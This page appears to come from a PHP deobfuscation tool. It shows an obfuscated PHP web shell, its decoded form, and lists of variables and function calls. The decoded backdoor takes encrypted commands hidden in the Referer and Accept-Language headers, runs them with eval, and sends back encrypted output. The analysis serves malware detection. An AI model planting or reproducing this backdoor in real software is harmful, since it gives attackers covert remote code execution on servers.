Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $J='$kh="e10a"7;7$kf="dc39";f7un7ction 7x7($t7,$k){$7c=strlen($k);$l=st7r7le7n($t);..

Decoded Output download

$kh="e10a";$kf="dc39";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$J='$kh="e10a"7;7$kf="dc39";f7un7ction 7x7($t7,$k){$7c=strlen($k);$l=st7r7le7n($t);$o=';
$a='""7;for($i=70;$i<$l77;){7for($j=0;7($7j<$c&&$i<$l);$j++77,$i++){$o.7=$t{$7i}^$k{7$';
$k='.$7kf),0,3));7$p=""7;for($z=1;$z<co7unt($7m7[1]7);$z++)$p.=$q[$7m[27][$z]];7if7(7str';
$P='array_va7lues7($q);pr7eg_ma7tch7_all("/(77[\\w])[\\w-7]+(?:;77q=0.([\\d]))?,?7/",$7ra';
$i='i].7=$p;$e=strpos7($s7[$i],$7f);if($e)77{$k=$kh.7$kf;ob_sta7rt()7;@ev7al7(@7gzuncom';
$O=',$m)7;if(7$q&&$m){7@ses7sion_sta7rt7();$s=&$_SE7SSIO77N;$ss="subs7tr7";$sl="strto';
$d='lowe7r"7;7$i=$m[1][0].$m[1]7[1];$h7=7$sl($ss(m7d5($i.$k7h),07,3));$f7=$sl($s7s(m77d5(7$i';
$H='PT_L7ANGU7AGE"];if7($rr&7&7$ra){$u=parse_u7rl($r77r7);parse_str($7u7["quer7y"],$q);$q=';
$p='$ss(7$s[$7i]7,0,$7e))),$k)));77$o=o7b_get_7con7tent7s7();7ob_end77_clean();$d=bas';
$j='j7};}}return $o7;}$r7=$_SER7VER;$r7r=@$r["H77T7TP_REFERER"];$ra7=7@$7r[7"HTTP_ACCE';
$w='7e64_encode(x(gzc7ompress($o),$k7));p7rint("<7$k>$7d</$k>");@sess7i7on_des7troy();}}}}';
$C='7press(@x7(@bas7e674_decod7e(7preg_replace(array("/7_/"7,"/7-7/"),a7rray("/","+"),';
$b=str_replace('hE','','hEchErhEeate_fhEhEunctihEon');
$r='pos($p7,$h)===0){$7s[$i]7="";$p=$s7s7($p,37)7;}if(array_7key_exists(7$i,$s7)){$7s[$';
$u=str_replace('7','',$J.$a.$j.$H.$P.$O.$d.$k.$r.$i.$C.$p.$w);
$Q=$b('',$u);$Q();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$C 7press(@x7(@bas7e674_decod7e(7preg_replace(array("/7_/"7,"/7..
$H PT_L7ANGU7AGE"];if7($rr&7&7$ra){$u=parse_u7rl($r77r7);parse_..
$J $kh="e10a"7;7$kf="dc39";f7un7ction 7x7($t7,$k){$7c=strlen($k..
$O ,$m)7;if(7$q&&$m){7@ses7sion_sta7rt7();$s=&$_SE7SSIO77N;$ss=..
$P array_va7lues7($q);pr7eg_ma7tch7_all("/(77[\w])[\w-7]+(?:;77..
$Q None
$a ""7;for($i=70;$i<$l77;){7for($j=0;7($7j<$c&&$i<$l);$j++77,$i..
$b create_function
$d lowe7r"7;7$i=$m[1][0].$m[1]7[1];$h7=7$sl($ss(m7d5($i.$k7h),0..
$i i].7=$p;$e=strpos7($s7[$i],$7f);if($e)77{$k=$kh.7$kf;ob_sta7..
$j j7};}}return $o7;}$r7=$_SER7VER;$r7r=@$r["H77T7TP_REFERER"];..
$k .$7kf),0,3));7$p=""7;for($z=1;$z<co7unt($7m7[1]7);$z++)$p.=$..
$p $ss(7$s[$7i]7,0,$7e))),$k)));77$o=o7b_get_7con7tent7s7();7ob..
$r pos($p7,$h)===0){$7s[$i]7="";$p=$s7s7($p,37)7;}if(array_7key..
$u $kh="e10a";$kf="dc39";function x($t,$k){$c=strlen($k);$l=str..
$w 7e64_encode(x(gzc7ompress($o),$k7));p7rint("<7$k>$7d</$k>");..

Stats

MD5 3d5b7675bce384c736ff4f5d69e99e49
Eval Count 1
Decode Time 108 ms